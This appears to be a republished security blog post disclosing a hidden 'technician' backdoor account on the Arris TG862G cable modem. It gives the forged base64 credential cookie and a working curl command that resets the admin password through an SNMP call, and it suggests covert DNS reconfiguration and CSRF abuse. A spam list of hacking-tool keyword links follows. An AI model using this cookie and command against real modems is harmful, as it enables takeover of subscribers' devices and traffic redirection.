Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW
After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):
Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:
{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}And after base64 decoding the "credential" value we get:
{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:
Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9Which decodes to the following:
{"credential":"dGVjaG5pY2lhbjo="}And finally:
{"credential":"technician:"}Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(
That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.
Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:
That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:
Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:
SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:
HTTP/1.1 200 OKWhat about setting a new value? Surely that will not work....
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}
That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:
This functionality can be wrapped up in the following curl command:
curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.
The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this
Related posts
- Pentest Tools Website
- Hacker Tools Apk Download
- Install Pentest Tools Ubuntu
- Hacker Tools Windows
- Hacking Tools For Windows Free Download
- Free Pentest Tools For Windows
- Best Hacking Tools 2019
- Pentest Reporting Tools
- Hacker Tools For Pc
- Pentest Tools Find Subdomains
- Hack Tools For Ubuntu
- Hacker Security Tools
- Hacking Tools For Games
- Termux Hacking Tools 2019
- Nsa Hack Tools Download
- Pentest Tools Tcp Port Scanner
- Blackhat Hacker Tools
- Hack Tools Download
- How To Install Pentest Tools In Ubuntu
- What Is Hacking Tools
- How To Hack
- Black Hat Hacker Tools
- Hacker
- Hacker Tools Mac
- Pentest Tools
- Hacking Tools 2019
- Hack Tools
- Blackhat Hacker Tools
- Pentest Tools
- How To Hack
- Hacker Tools Github
- Hack Tools
- Best Hacking Tools 2020
- Easy Hack Tools
- Hacking Tools For Windows 7
- Hack Tool Apk
- What Is Hacking Tools
- World No 1 Hacker Software
- Hacking Tools For Mac
- Beginner Hacker Tools
- Pentest Tools Windows
- Hacking Tools Windows
- Hacking Tools Kit
- Tools 4 Hack
- Hacker Hardware Tools
- Pentest Tools Linux
- Pentest Tools Github
- Pentest Tools Url Fuzzer
- Hacker Tools Hardware
- Underground Hacker Sites
- Termux Hacking Tools 2019
- Hacker
- Nsa Hack Tools Download
- New Hack Tools
- Hacking Tools For Mac
- Usb Pentest Tools
- Pentest Reporting Tools
- Android Hack Tools Github
- Hacker Tools Hardware
- Hacking Tools For Windows 7
- Pentest Tools Tcp Port Scanner
- Tools Used For Hacking
- Free Pentest Tools For Windows
- Pentest Tools Kali Linux
- Hacking Tools Pc
- Pentest Tools Review
- Top Pentest Tools
- Free Pentest Tools For Windows
- Hackers Toolbox
- Hacking Tools For Windows Free Download
- Hacking Tools
- Hack Tools Pc
- New Hack Tools
- Hacking Tools Windows
- Tools For Hacker
- Pentest Reporting Tools
- Hacking Tools Software
- Hacking Tools
- Hacking Tools 2020
- Easy Hack Tools
- Computer Hacker
- Pentest Tools Url Fuzzer
- Hacking Tools Pc
- Hacking Tools For Windows 7
- Hacker Tools Apk Download
- Termux Hacking Tools 2019
- Hacking Tools 2019
- Hacking Tools For Windows 7
- Pentest Tools Online
- Hacking Tools Kit
- Pentest Tools Review
- Hacker Tools For Mac
- Hacker Security Tools
- Hack And Tools
- Hacking Tools For Games
- Hack Tools Pc
- Hacker Tools For Ios
- Hacking Tools For Games
- Wifi Hacker Tools For Windows
- Hack Tools Online
- Hacking Tools Online
- Termux Hacking Tools 2019
- Hack Tools 2019
- Hacking Tools For Games
- Physical Pentest Tools
- Pentest Automation Tools
- Hacking Tools For Games
- Hacker
- Hacking Tools Pc
- Android Hack Tools Github
- Top Pentest Tools
- Pentest Box Tools Download
- Usb Pentest Tools
- Beginner Hacker Tools
- Hack Tools For Games
- Top Pentest Tools
- Hak5 Tools
- Termux Hacking Tools 2019
- Bluetooth Hacking Tools Kali
- Pentest Tools Port Scanner
- Hacking Tools Pc
- Hack Tools
- Hacker Tools Mac
- Kik Hack Tools
- Growth Hacker Tools
- Hack Tool Apk
- Hack Tools For Ubuntu
- Hacking App
- Hack Tools For Mac
- Hack Tools 2019
- Black Hat Hacker Tools
- How To Hack
- Pentest Recon Tools
- Hacker Tools Software
- Hack Tools Github
- Hack Tools Github
- Pentest Tools Framework
- Hack Tools
- Hacker Tools Windows
No comments:
Post a Comment